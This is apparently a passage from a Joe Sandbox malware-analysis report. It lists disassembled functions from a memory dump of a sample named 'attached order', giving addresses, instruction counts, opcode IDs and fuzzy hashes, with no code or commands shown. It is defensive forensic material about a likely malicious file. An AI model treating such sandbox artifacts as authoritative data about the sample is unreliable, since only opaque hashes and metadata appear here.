                                                                                          • Instruction Fuzzy Hash: C461A071604616AFD715CF69C888BABFBE9FF58710F00461DFA5987344DB30A914CB92
                                                                                          Function 0175CD10 Relevance: .2, Instructions: 165COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
                                                                                          • Instruction ID: ede141ef91028c30c254377eb6f88208c96bd4cacd0d496149e599bae6de9fc8
                                                                                          • Opcode Fuzzy Hash: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
                                                                                          • Instruction Fuzzy Hash: FA518E75E0034A9BCF15CFACD8806FEFBB5FB48310F198169D915A7314DA789A49CB90
                                                                                          Function 017F892E Relevance: .2, Instructions: 162COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a129c0382ff52cb5f072916dd16d034a8f1524f1c1bf1ba0f3faf98f0080fa88
                                                                                          • Instruction ID: 004f841c5125b494d988fee5d851d5159750cf7ea517952c37a91c5fba6bb9ad
                                                                                          • Opcode Fuzzy Hash: a129c0382ff52cb5f072916dd16d034a8f1524f1c1bf1ba0f3faf98f0080fa88
                                                                                          • Instruction Fuzzy Hash: D751AD716047029BE716DF28C844BABB7E5EF84354F04492CFA9597390EB34EA08CB92
                                                                                          Function 0176E363 Relevance: .2, Instructions: 158COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d949e4b61bc174a3b1470a665048eb77faffab03197f0455481f94530edbab24
                                                                                          • Instruction ID: 296cab12c54e51c38b19a367ac0d11212ef1756afbfb74aa31d83f8b4c37a1f6
                                                                                          • Opcode Fuzzy Hash: d949e4b61bc174a3b1470a665048eb77faffab03197f0455481f94530edbab24
                                                                                          • Instruction Fuzzy Hash: 9E515A71200A06DFCB22EF68C994FAAF7FDFB14744F40056AEA5697261DB30E941CB61
                                                                                          Function 0175AD20 Relevance: .2, Instructions: 158COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e5182a464c28648d00d46bda124c141606d33a65f9c3509e1367bf70d84f0e3
                                                                                          • Instruction ID: f28489861fe6920a2d6ef87ea673b8a0cf8a4898d21782b75f53f1764567e81d
                                                                                          • Opcode Fuzzy Hash: 0e5182a464c28648d00d46bda124c141606d33a65f9c3509e1367bf70d84f0e3
                                                                                          • Instruction Fuzzy Hash: E3513032A40A45EFCB27AF18D845B6AF776FB88A54F1441B9E9018B256CBB4DC01CB80
                                                                                          Function 017544D1 Relevance: .2, Instructions: 156COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                                                          • Instruction ID: a16f40361cf0e27c374908e5091d985576e6cc01d7d9bda69673bf1972159161
                                                                                          • Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                                                          • Instruction Fuzzy Hash: 6A518171E0021AABDF55DF98C454FEEFBB5EF44714F144069EA02AB240EBB4D985CBA0
                                                                                          Function 017BE660 Relevance: .2, Instructions: 154COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
                                                                                          • Instruction ID: 264755ef0e5f65c2abfc4f9120ffefea51dc127be12fb11dc85040c20cd2bbdb
                                                                                          • Opcode Fuzzy Hash: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
                                                                                          • Instruction Fuzzy Hash: 4D51A57190021AEFEF219AA4CCC4BEEFBB9AF14724F114665E51167391DB749E408B90
                                                                                          Function 017FCDEB Relevance: .2, Instructions: 153COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ed2207d77c0d6efe1081a5fabc97aed0849c69b708ff8aa42de684460e441ab5
                                                                                          • Instruction ID: cbb5efdbad8d0aea8ed319f0e589c6463ede1f58106e9d115c71afecd014916b
                                                                                          • Opcode Fuzzy Hash: ed2207d77c0d6efe1081a5fabc97aed0849c69b708ff8aa42de684460e441ab5
                                                                                          • Instruction Fuzzy Hash: DF5157726083469FD712CF68C884E5BFBE5FB88254F04892DFA9597384D734E905CB92
                                                                                          Function 017F86A8 Relevance: .2, Instructions: 152COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a58a4ab3c56aaabf97dbad0d6b23da17b0734f42fded8a157edc3249d95cab98
                                                                                          • Instruction ID: 8d91590aad0138c4512cbef2217bac5c46be0f6fdafdc0ff4dc41b9583a19b24
                                                                                          • Opcode Fuzzy Hash: a58a4ab3c56aaabf97dbad0d6b23da17b0734f42fded8a157edc3249d95cab98
                                                                                          • Instruction Fuzzy Hash: 3F41F5317506119BD729DB2DC898B7BFB9AEF90760F14821CFB1587384DB34D811C6A2
                                                                                          Function 017BC870 Relevance: .1, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2e276a9781ac52ae11f7db464178b298d50a7db599837bfce39d61cb981972ff
                                                                                          • Instruction ID: d87bec7b9926f55d80c535309208d6afd243cd61a0e1742e93d613ea86142c14
                                                                                          • Opcode Fuzzy Hash: 2e276a9781ac52ae11f7db464178b298d50a7db599837bfce39d61cb981972ff
                                                                                          • Instruction Fuzzy Hash: EC515B7190021ADFDB32DFA9C4C4A9EF7B9FF58354B248569E945A3309D734AA01CFA0
                                                                                          Function 0176CB20 Relevance: .1, Instructions: 147COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 298469e83004a26029a9509be2c436553a2f7b8ee17bb42368144b2842c4d225
                                                                                          • Instruction ID: 6eb2aec528a22b1b63d6005438a5f7fca7f8de7f4857733a16dcf9d68a5bd76f
                                                                                          • Opcode Fuzzy Hash: 298469e83004a26029a9509be2c436553a2f7b8ee17bb42368144b2842c4d225
                                                                                          • Instruction Fuzzy Hash: D151CC30600206CBEB27CE2CC954629F79DEB81315F58C5AAED8ECB146D635CCC1EB92
                                                                                          Function 0176A350 Relevance: .1, Instructions: 139COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7a489cb8e1ee73165a776604b2d95faa322d704fbea59eea79f14db49cd29980
                                                                                          • Instruction ID: e93b78326708ba701adbfb7cd4b7793ea928875a659a36c574dc6f29418ffeec
                                                                                          • Opcode Fuzzy Hash: 7a489cb8e1ee73165a776604b2d95faa322d704fbea59eea79f14db49cd29980
                                                                                          • Instruction Fuzzy Hash: 6E416B71A403215BCF36EF6DD885B2AFB69EB91708F04902DFD15AB245D7B1DA408B90
                                                                                          Function 017FA553 Relevance: .1, Instructions: 139COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                                                          • Instruction ID: 22ede4f4acf07a664cdfa6fb1552d27442046687df22242cbccba0050522d607
                                                                                          • Opcode Fuzzy Hash: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                                                          • Instruction Fuzzy Hash: 2641E7726147169FDB25CF28C888A6BF7A9FF84314B14856DEA1A8B344EB30ED14C7D1
                                                                                          Function 01760118 Relevance: .1, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0f10db67bd4efbf9b0a6acf3f209d3534e9d0b7856976d6e3f0c5375bf94f1c0
                                                                                          • Instruction ID: 9b6c1f400a3467bef42478b7e6b5348856c766062517e904a9ec19b729c0b15a
                                                                                          • Opcode Fuzzy Hash: 0f10db67bd4efbf9b0a6acf3f209d3534e9d0b7856976d6e3f0c5375bf94f1c0
                                                                                          • Instruction Fuzzy Hash: 9041BB36915219DFDB14DF98C440AEEFBB8BF48704F1482AAF816E7250D7359D41CBA4
                                                                                          Function 0175EB1C Relevance: .1, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7a9a1af4b1a02cc8f8945f54e589fe36f33be12b3a77b2aaf6d307c69939deef
                                                                                          • Instruction ID: 89dcb1b8fc450b8d046d26645fe79ce935ff5a934a6f5c2447c1b3ffba1a8fda
                                                                                          • Opcode Fuzzy Hash: 7a9a1af4b1a02cc8f8945f54e589fe36f33be12b3a77b2aaf6d307c69939deef
                                                                                          • Instruction Fuzzy Hash: 2B41E3716043029FDB65DF38D884A1BFBF9FF88214F104869E997C7216DB70E9448B61
                                                                                          Function 01772670 Relevance: .1, Instructions: 137COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                          • Instruction ID: 693d83499f679dfd78548dd6ca2e36e90c9af401800733c3b741643b1d821d24
                                                                                          • Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                          • Instruction Fuzzy Hash: E5515A75A00226DFDB15CF99C480AAEF7B1FFC8710F6482A9D815A7391D731AE41CB90
                                                                                          Function 01736074 Relevance: .1, Instructions: 133COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4625341e57572aabfce81f4d789f43a2531582b08660b83ceb09063ae51a0087
                                                                                          • Instruction ID: 87831d5ea92a2e0ac8418b6a45313d67cb0ff76c49cd407b0f9b5517d06c04c7
                                                                                          • Opcode Fuzzy Hash: 4625341e57572aabfce81f4d789f43a2531582b08660b83ceb09063ae51a0087
                                                                                          • Instruction Fuzzy Hash: 2651C170A00116EBDB36CB28CC09BA9FBB5FF51314F1482A9E519972D7E7749A85CF80
                                                                                          Function 01730AED Relevance: .1, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2852232dffe9ccbc393410a6577ab9a9fa98ad0a286e65f4889bb7ea775e76af
                                                                                          • Instruction ID: d709c8b3f5c34c653b345f6362293287c87af3e853d79c0436c7105a5115dada
                                                                                          • Opcode Fuzzy Hash: 2852232dffe9ccbc393410a6577ab9a9fa98ad0a286e65f4889bb7ea775e76af
                                                                                          • Instruction Fuzzy Hash: D5418531A40229DBDB21EF28C884FEAF7B4EF45740F0100A5E949AB241DB74DE85CB95
                                                                                          Function 01730C79 Relevance: .1, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 32973428e43f0b8ed519a371c9467cfb5b44440a5ced7017e2a03af42f5e4bb9
                                                                                          • Instruction ID: fd4a73982f8eb84f82e487df1675d41a730351499228c77f74fe6aa5abc80ade
                                                                                          • Opcode Fuzzy Hash: 32973428e43f0b8ed519a371c9467cfb5b44440a5ced7017e2a03af42f5e4bb9
                                                                                          • Instruction Fuzzy Hash: A541A571650714DFEB32DF28CC88F6AFBE9AB95610F04009AF9459B286D7B4ED80CB51
                                                                                          Function 017F81EE Relevance: .1, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                          • Instruction ID: 507dcb603348b2638132722fde4e5a45823b281980fe361679262f9f9fe17650
                                                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                          • Instruction Fuzzy Hash: 9541B575B00206ABEF15DF99C885AAFFBBAEF98710F14406DEA05A7351DA70DE00C761
                                                                                          Function 017307A7 Relevance: .1, Instructions: 128COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ab9fe815c2a3227d52c542d23ce5fad1ce1625967314b6e68359772436992b92
                                                                                          • Instruction ID: 4991ad6ff821691b594bc635f47653f68f888cde12a834d3b962d64b2c5b923d
                                                                                          • Opcode Fuzzy Hash: ab9fe815c2a3227d52c542d23ce5fad1ce1625967314b6e68359772436992b92
                                                                                          • Instruction Fuzzy Hash: FD41CF70640701DFD729CF28D884A62F7F9FF88314B108A6DE55787A52EB30E955CB90
                                                                                          Function 0175A390 Relevance: .1, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: af9f781633859572e8e3c90c86c50b5932eedba0cd604afd675c14a475c0f37f
                                                                                          • Instruction ID: c747db5193f463bf1a1ca6bdd85c640e639547e93ce793648e0129103907c004
                                                                                          • Opcode Fuzzy Hash: af9f781633859572e8e3c90c86c50b5932eedba0cd604afd675c14a475c0f37f
                                                                                          • Instruction Fuzzy Hash: 4941AD31904215CFDF62DFACD498BADFBB1FB58314F1442A9D911AB295DBB49A00CFA0
                                                                                          Function 01738B10 Relevance: .1, Instructions: 124COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe918466854367bd48e37deeb9ab0f8b35372744acfdf424cb94bdc2897c7ab5
                                                                                          • Instruction ID: ef50ce9a087e6adcd1a09e6a4523e172ac5368217af494bd364f00ebbced0334
                                                                                          • Opcode Fuzzy Hash: fe918466854367bd48e37deeb9ab0f8b35372744acfdf424cb94bdc2897c7ab5
                                                                                          • Instruction Fuzzy Hash: 8741E272A01206DFCB36DF48D884A5AFBB5FBC4704F15826AE5019B25BC375D942CFA1
                                                                                          Function 017288C8 Relevance: .1, Instructions: 123COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 863f01683467e29a1fd0deae91b1d59a2572e35b9684b8d41328ef64e25ed870
                                                                                          • Instruction ID: 2ca62264d75f36beab07c9023db30467c91fa2d4ba509729aea02d2a84b9df47
                                                                                          • Opcode Fuzzy Hash: 863f01683467e29a1fd0deae91b1d59a2572e35b9684b8d41328ef64e25ed870
                                                                                          • Instruction Fuzzy Hash: C4414C716083169ED312DF688840A6BF7E9EF84B54F00092AF994D7250E771DE558BA3
                                                                                          Function 017308CD Relevance: .1, Instructions: 122COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7f04000a26e3bcfef9793799f3ace7f8b0c5e725263880211611cc92b663f07d
                                                                                          • Instruction ID: a3a7477949c6c99d8b2df9f58f72dd475c9737062a9f91eb5973e515f5260922
                                                                                          • Opcode Fuzzy Hash: 7f04000a26e3bcfef9793799f3ace7f8b0c5e725263880211611cc92b663f07d
                                                                                          • Instruction Fuzzy Hash: A7414771605701EFE721DF18D840B2AFBE4FF94314F24896AF4898B252E770E942CB91
                                                                                          Function 01760630 Relevance: .1, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                          • Instruction ID: e520895d10200e92ae226ec136fd18f84d22ef080c3bec9d04d7ee8086b31801
                                                                                          • Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                          • Instruction Fuzzy Hash: 05411875A00605EFDB25CF98C980AAAFBF8FF48700B20496DE956E7651E730AE44CF50
                                                                                          Function 0173254C Relevance: .1, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 14908395950c5d3d51ad476df4846c8816c4ac6b36eb07aff53921291d5c22cc
                                                                                          • Instruction ID: 38588e1898fb688b5cf9282f0bd28e4b2d4ef965cf5c036084bb4298556de6cb
                                                                                          • Opcode Fuzzy Hash: 14908395950c5d3d51ad476df4846c8816c4ac6b36eb07aff53921291d5c22cc
                                                                                          • Instruction Fuzzy Hash: C241BDB1901705CFC722EF28D954A59F7B1FF94314F20829AD5068B6A7EB30AB81CF41
                                                                                          Function 0176C819 Relevance: .1, Instructions: 116COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 86210cea85086c4bfe3e230fcb99f9ca14af1b7917d2f8ee9edd73029d0f8368
                                                                                          • Instruction ID: 6b57cb6510698c794e1b5100abea651b19120974f05772d171cbb1cdf98876e3
                                                                                          • Opcode Fuzzy Hash: 86210cea85086c4bfe3e230fcb99f9ca14af1b7917d2f8ee9edd73029d0f8368
                                                                                          • Instruction Fuzzy Hash: CD3179B2A44705DFDB12DFA8C440799FBF4FB49724F2081AAD509EB291D3369A42CF90
                                                                                          Function 017B0443 Relevance: .1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e1002137f87030dff0cee1bda5ee9354769436c69c47f6f24d7c9dac8f1fc78c
                                                                                          • Instruction ID: 90d4b35a1939822d4cb163a35065122832c35864d612c4b33aa49fd33a0cbbe5
                                                                                          • Opcode Fuzzy Hash: e1002137f87030dff0cee1bda5ee9354769436c69c47f6f24d7c9dac8f1fc78c
                                                                                          • Instruction Fuzzy Hash: 66418FB15083119FD761DF29C844B9BFBE8FF88254F108A2AF998C7294E7749905CB92
                                                                                          Function 018029CF Relevance: .1, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 964b431755c31cf60f3e7e272b63c36df6a51c7b6807d6792e3bb1ab7187f77e
                                                                                          • Instruction ID: 386126885ca990b3c1addb72dd359c34f217e03df7e83d4c2d86d039cf729aeb
                                                                                          • Opcode Fuzzy Hash: 964b431755c31cf60f3e7e272b63c36df6a51c7b6807d6792e3bb1ab7187f77e
                                                                                          • Instruction Fuzzy Hash: 84416472A00109EFDB16CF98CCC4A9EBBB6FF84754F144069E505AB345DB70EA81CB90
                                                                                          Function 017B0227 Relevance: .1, Instructions: 111COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 527c172061a3264183b5921773152b38a625a725666bd35d11ec39f0e8cb70c7
                                                                                          • Instruction ID: fa19b2e45fd8239e80b9415faf3e27c0a0502211facb3afa9d88f65a7b5e04bb
                                                                                          • Opcode Fuzzy Hash: 527c172061a3264183b5921773152b38a625a725666bd35d11ec39f0e8cb70c7
                                                                                          • Instruction Fuzzy Hash: 534191726056429FD321DF68D898BABF7F9BF88700F040A2DF95987694E730D904C7A6
                                                                                          Function 01734779 Relevance: .1, Instructions: 111COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4de73eeb584f84ed6c910c3d4cbb6fb41786ab39996b75f8ce32dce3370b6753
                                                                                          • Instruction ID: 28a54e0846486ba7a18a24eb51d3182c131b2c9326421be0d6db892966d182b3
